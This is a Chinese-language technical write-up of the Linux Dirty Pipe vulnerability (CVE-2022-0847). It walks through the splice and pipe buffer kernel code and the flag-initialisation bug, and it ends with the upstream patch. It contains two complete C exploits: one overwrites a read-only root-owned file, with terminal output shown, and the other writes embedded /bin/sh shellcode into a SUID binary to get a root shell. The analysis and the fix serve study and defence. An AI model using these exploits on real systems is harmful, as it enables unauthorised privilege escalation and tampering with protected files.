下面使用 Linux 5.13.19 内核源码
pipe
pipe部分参考pipe结构体 重点:
- 写入操作申请新内存页时,通常会初始化
pipe_buffer->flag为PIPE_BUF_FLAG_CAN_MERGE - 是向管道写入数据时,管道非空且上一个
pipe_buffer未满,并存在PIPE_BUF_FLAG_CAN_MERGE标志时,则会尝试向此pipe_buffer写入数据
slice
文件与管道间数据拷贝
当想要将一个文件数据拷贝到另一个文件时,朴素的方法是打开文件后将源文件数据读入后再写入目标文件,这样需要在用户空间与内核空间来回进行数据拷贝,有较大开销

引入splice 零拷贝 只需要2次上下文切换
作用是在文件与管道之间进行数据拷贝,从而将内核空间与用户空间之间的数据拷贝转变为内核空间内的数据拷贝,避免数据在用户空间与内核空间之间的拷贝造成的开销

glibc中wrapper如下
#define _GNU_SOURCE /* See feature_test_macros(7) */ #include <fcntl.h> ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, size_t len, unsigned int flags);
本质上就是利用管道在内核空间中进行数据拷贝
如果要将数据从一个文件描述符拷贝到另一个文件描述符中,只需要先创建一个管道,使用splice系统调用将数据从源文件描述符拷贝到管道中、再用splice系统调用将数据从管道拷贝到目的文件描述符,从而只需要两次系统调用
splice 系统调用正式操作前都是一些基础的检查工作,这一块不深入分析,存在如下调用链:
SYS_splice() // 检查文件描述符是否可用 __do_splice() // 检查是否入设置了偏移或出设置了偏移(任一则返回)(管道不能指定偏移量) do_splice() // 分流
最终文件与管道间的分流发生在 do_splice() 函数:
- 从管道读取到管道,调用
splice_pipe_to_pipe() - 从文件读取到管道,调用
splice_file_to_pipe() - 从管道读取到文件,调用
do_splice_from()
从文件读取到管道
核心原理:将pipe_buffer对应的page设置为文件映射的page
涉及下面调用链
splice_file_to_pipe() do_splice_to()
最终执行in->f_op->splice_read(in, ppos, pipe, len, flags);
调用内核文件结构体函数表的splice_read指针,对于不同文件系统该函数指针不同,ext4中函数指针对应ext4_file_operations,splice_read对应generic_file_splice_read
const struct file_operations ext4_file_operations = { .llseek = ext4_llseek, .read_iter = ext4_file_read_iter, .write_iter = ext4_file_write_iter, .iopoll = iomap_dio_iopoll, .unlocked_ioctl = ext4_ioctl, #ifdef CONFIG_COMPAT .compat_ioctl = ext4_compat_ioctl, #endif .mmap = ext4_file_mmap, .mmap_supported_flags = MAP_SYNC, .open = ext4_file_open, .release = ext4_release_file, .fsync = ext4_sync_file, .get_unmapped_area = thp_get_unmapped_area, .splice_read = generic_file_splice_read, .splice_write = iter_file_splice_write, .fallocate = ext4_fallocate, };
generic_file_splice_read()内部先调用iov_iter_pipe(),根据管道数据初始化iov_iter结构
void iov_iter_pipe(struct iov_iter *i, unsigned int direction, struct pipe_inode_info *pipe, size_t count) { BUG_ON(direction != READ); WARN_ON(pipe_full(pipe->head, pipe->tail, pipe->ring_size)); i->type = ITER_PIPE | READ; i->pipe = pipe; i->head = pipe->head; i->iov_offset = 0; i->count = count; i->start_head = i->head; } EXPORT_SYMBOL(iov_iter_pipe);
接着调用call_read_iter()
static inline ssize_t call_read_iter(struct file *file, struct kiocb *kio, struct iov_iter *iter) { return file->f_op->read_iter(kio, iter); }
所以最终又会调用ext4_file_read_iter
核心调用链如下,最终调用到copy_page_to_iter_pipe()
ext4_file_read_iter() generic_file_read_iter() filemap_read() filemap_get_pages() // 根据长度获取到文件对应映射的页面集 copy_page_to_iter() // 进行页面拷贝(单位为单个页面) 循环处理pvec数组(存放页面集) __copy_page_to_iter() copy_page_to_iter_pipe() // 我们是管道,所以走入该分支
注意参数,第一个参数page是文件对应映射的页面,最后一个参数i对应管道(iov_iter)
先取出当前pipe_buffer,如果当前管道缓冲区偏移不为0,且管道缓冲区偏移和文件偏移一样 && 管道页面和文件页面相同,则进行合并;否则无法合并,管道head自增1,取出新的pipe_buffer
之后判断确保管道空间未满,按照文件页面设置pipe_buffer,get_page()增加页面引用计数,核心是buf->page = page;直接将该pipe_buffer页面设置为文件页面,从而利用管道映射文件数据
最后管道head自增1,更新管道iov_iter数据
注意到 这里对于读入数据偏移和长度的控制,是直接通过设置
pipe_buffer的offset和len控制的,对于文件页面是直接映射的
上述操作存在的问题:缺少对pipe_buffer->flags重新赋值
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes, struct iov_iter *i) { struct pipe_inode_info *pipe = i->pipe; struct pipe_buffer *buf; unsigned int p_tail = pipe->tail; unsigned int p_mask = pipe->ring_size - 1; unsigned int i_head = i->head; size_t off; if (unlikely(bytes > i->count)) bytes = i->count; if (unlikely(!bytes)) return 0; if (!sanity(i)) return 0; off = i->iov_offset; buf = &pipe->bufs[i_head & p_mask]; if (off) { if (offset == off && buf->page == page) { /* merge with the last one */ buf->len += bytes; i->iov_offset += bytes; goto out; } i_head++; buf = &pipe->bufs[i_head & p_mask]; } if (pipe_full(i_head, p_tail, pipe->max_usage)) return 0; buf->ops = &page_cache_pipe_buf_ops; get_page(page); buf->page = page; buf->offset = offset; buf->len = bytes; pipe->head = i_head + 1; i->iov_offset = offset + bytes; i->head = i_head; out: i->count -= bytes; return bytes; }
从管道读取到文件
do_splice_from 最终会调用对应内核文件结构的函数表中的 splice_write() 指针,将 pipe_buffer 数组对应页面上内容读出,写入到文件中,对于不同的文件系统而言该函数指针不同
/* * Attempt to initiate a splice from pipe to file. */ static long do_splice_from(struct pipe_inode_info *pipe, struct file *out, loff_t *ppos, size_t len, unsigned int flags) { if (unlikely(!out->f_op->splice_write)) return warn_unsupported(out, "write"); return out->f_op->splice_write(pipe, out, ppos, len, flags); }
ext4文件系统中,最终调用到iter_file_splice_write函数,之后存在如下调用链
iter_file_splice_write() splice_from_pipe_next() // 检查管道可用性 vfs_iter_write() // 读出管道数据写入文件 do_iter_write() do_iter_readv_writev() call_write_iter() //传入type为write
漏洞分析
- 将管道整个读写一轮,此时所有
pipe_buffer都保留了PIPE_BUF_FLAG_CAN_MERGE - 利用splice将数据从文件读取一个字节到管道上,此时 pipe_buffer 对应page指向文件映射的页面,splice 中没有清空pipe_buffer标志位
- splice 建立完页面映射后,head 指向下一个
pipe_buffer。此时接着往管道写入数据,会发现上一个pipe_buffer还没有满(struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];)、且能够容纳要写入的数据长度、且其标志位为PIPE_BUF_FLAG_CAN_MERGE,因此内核会认为该页面可以被写入,从而完成越权写入文件操作
漏洞利用
- 先把管道全部全部读写一遍,这样的话管道会初始化所有的
pipe_buffer,设置标志位PIPE_BUF_FLAG_CAN_MERGE - 之后用
splice系统调用将数据从目标文件读入管道,从而pipe_buffer->page变成文件在内存中映射的页面 - 将文件数据读入管道后,管道head指向下一个
pipe_buffer,继续写入数据,此时会检查上一个管道如果空间够且标志位为PIPE_BUF_FLAG_CAN_MERGE则直接从上一个管道开始写入数据,从而越权写入文件
poc
/* * POC of CVE-2022-0847 * written by arttnba3 */ #define _GNU_SOURCE #include <unistd.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/stat.h> #include <sys/user.h> void errExit(char * msg) { printf("\033[31m\033[1m[x] Error : \033[0m%s\n", msg); exit(EXIT_FAILURE); } int main(int argc, char **argv, char **envp) { long page_size; size_t offset_in_file; size_t data_size; int target_file_fd; struct stat target_file_stat; int pipe_fd[2]; int pipe_size; char *buffer; int retval; // checking before we start to exploit if (argc < 4) { puts("[*] Usage: ./exp target_file offset_in_file data"); exit(EXIT_FAILURE); } page_size = sysconf(_SC_PAGE_SIZE); offset_in_file = strtoul(argv[2], NULL, 0); if (offset_in_file % page_size == 0) errExit("Cannot write on the boundary of a page!"); target_file_fd = open(argv[1], O_RDONLY); if (target_file_fd < 0) errExit("Failed to open the target file!"); if (fstat(target_file_fd, &target_file_stat)) errExit("Failed to get the info of the target file!"); if (offset_in_file > target_file_stat.st_size) errExit("Offset is not in the file!"); data_size = strlen(argv[3]); if ((offset_in_file + data_size) > target_file_stat.st_size) errExit("Cannot enlarge the file!"); if (((offset_in_file % page_size) + data_size) > page_size) errExit("Cannot write accross a page!"); // exploit now... puts("\033[34m\033[1m[*] Start exploiting...\033[0m"); /* * prepare the pipe, make every pipe_buffer a MERGE flag * Just write and read through */ puts("\033[34m\033[1m[*] Setting the PIPE_BUF_FLAG_CAN_MERGE for each buffer in pipe.\033[0m"); pipe(pipe_fd); pipe_size = fcntl(pipe_fd[1], F_GETPIPE_SZ); buffer = (char*) malloc(page_size); for (int size_left = pipe_size; size_left > 0; ) { int per_write = size_left > page_size ? page_size : size_left; size_left -= write(pipe_fd[1], buffer, per_write); } for (int size_left = pipe_size; size_left > 0; ) { int per_read = size_left > page_size ? page_size : size_left; size_left -= read(pipe_fd[0], buffer, per_read); } puts("\033[32m\033[1m[+] Flag setting has been done.\033[0m"); /* * Use the splice to make the pipe_buffer->page * become the page of the file mapped, by read * a byte from the file accross the splice */ puts("\033[34m\033[1m[*] Reading a byte from the file by splice.\033[0m"); offset_in_file--; // we read a byte, so offset should minus 1 retval = splice(target_file_fd, &offset_in_file, pipe_fd[1], NULL, 1, 0); if (retval < 0) errExit("splice failed!"); else if (retval == 0) errExit("short splice!"); puts("\033[32m\033[1m[+] File splice done.\033[0m"); /* * Now it comes to the time of exploit: * the mapped page of file has been in pipe_buffer, * and the PIPE_BUF_FLAG_CAN_MERGE is still set, * just a simple write can make the exploit. */ retval = write(pipe_fd[1], argv[3], data_size); if (retval < 0) errExit("Write failed!"); else if (retval < data_size) errExit("Short write!"); puts("\033[32m\033[1m[+] EXPLOIT DONE!\033[0m"); }
效果:
bash-5.2$ uname -a Linux (none) 5.13.19 #1 SMP Sun Jun 15 09:19:10 UTC 2025 x86_64 GNU/Linux bash-5.2$ ls -al /flag -rw-r--r-- 1 root root 11 Jun 15 09:29 /flag bash-5.2$ cat flag flag{1111} bash-5.2$ echo 1 >flag bash: flag: Permission denied bash-5.2$ /exp /flag 1 AAAA [*] Start exploiting... [*] Setting the PIPE_BUF_FLAG_CAN_MERGE for each buffer in pipe. [+] Flag setting has been done. [*] Reading a byte from the file by splice. [+] File splice done. [+] EXPLOIT DONE! bash-5.2$ cat /flag fAAAA1111}
提权
修改指定 suid 程序进行提权,使用 msfvenom 生成运行 /bin/sh 的 shellcode:
/* * exploit of CVE-2022-0847 * written by arttnba3 */ #define _GNU_SOURCE #include <unistd.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/stat.h> #include <sys/user.h> unsigned char shellcode[] = { 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x99, 0x50, 0x54, 0x5f, 0x52, 0x5e, 0x6a, 0x3b, 0x58, 0x0f, 0x05 }; unsigned int shellcode_len = 149; void errExit(char * msg) { printf("\033[31m\033[1m[x] Error : \033[0m%s\n", msg); exit(EXIT_FAILURE); } int main(int argc, char **argv, char **envp) { long page_size; size_t offset_in_file; size_t data_size; int target_file_fd; int pipe_fd[2]; int pipe_size; char *buffer; int retval; // checking before we start to exploit if (argc < 2) { puts("[*] Usage: ./exp target_file"); exit(EXIT_FAILURE); } page_size = sysconf(_SC_PAGE_SIZE); offset_in_file = 1; target_file_fd = open(argv[1], O_RDONLY); if (target_file_fd < 0) errExit("Failed to open the target file!"); // exploit now... puts("\033[34m\033[1m[*] Start exploiting...\033[0m"); /* * prepare the pipe, make every pipe_buffer a MERGE flag * Just write and read through */ puts("\033[34m\033[1m[*] Setting the PIPE_BUF_FLAG_CAN_MERGE for each buffer in pipe.\033[0m"); pipe(pipe_fd); pipe_size = fcntl(pipe_fd[1], F_GETPIPE_SZ); buffer = (char*) malloc(page_size); for (int size_left = pipe_size; size_left > 0; ) { int per_write = size_left > page_size ? page_size : size_left; size_left -= write(pipe_fd[1], buffer, per_write); } for (int size_left = pipe_size; size_left > 0; ) { int per_read = size_left > page_size ? page_size : size_left; size_left -= read(pipe_fd[0], buffer, per_read); } puts("\033[32m\033[1m[+] Flag setting has been done.\033[0m"); /* * Use the splice to make the pipe_buffer->page * become the page of the file mapped, by read * a byte from the file accross the splice */ puts("\033[34m\033[1m[*] Reading a byte from the file by splice.\033[0m"); offset_in_file--; // we read a byte, so offset should minus 1 retval = splice(target_file_fd, &offset_in_file, pipe_fd[1], NULL, 1, 0); if (retval < 0) errExit("splice failed!"); else if (retval == 0) errExit("short splice!"); puts("\033[32m\033[1m[+] File splice done.\033[0m"); /* * Now it comes to the time of exploit: * the mapped page of file has been in pipe_buffer, * and the PIPE_BUF_FLAG_CAN_MERGE is still set, * just a simple write can make the exploit. */ retval = write(pipe_fd[1], &shellcode[1], shellcode_len); if (retval < 0) errExit("Write failed!"); else if (retval < shellcode_len) errExit("Short write!"); puts("\033[32m\033[1m[+] EXPLOIT DONE!\033[0m"); puts("\033[34m\033[1m[*] Trigger root shell...\033[0m"); system(argv[1]); }
漏洞修复
添加上将pipe_buffer的flag置0,在copy_page_to_iter_pipe和push_pipe两个函数添加了置0代码
push_pipe 函数用来将数据通过迭代器写入管道,先把对应 pipe_buffer 写满,如果还有没写完的,再循环分配新pipe_buffer直到写完数据或者管道已满或内存页分配失败
diff --git a/lib/iov_iter.c b/lib/iov_iter.c index b0e0acdf96c1..6dd5330f7a99 100644 --- a/lib/iov_iter.c +++ b/lib/iov_iter.c @@ -414,6 +414,7 @@ static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t by return 0; buf->ops = &page_cache_pipe_buf_ops; + buf->flags = 0; get_page(page); buf->page = page; buf->offset = offset; @@ -577,6 +578,7 @@ static size_t push_pipe(struct iov_iter *i, size_t size, break; buf->ops = &default_pipe_buf_ops; + buf->flags = 0; buf->page = page; buf->offset = 0; buf->len = min_t(ssize_t, left, PAGE_SIZE);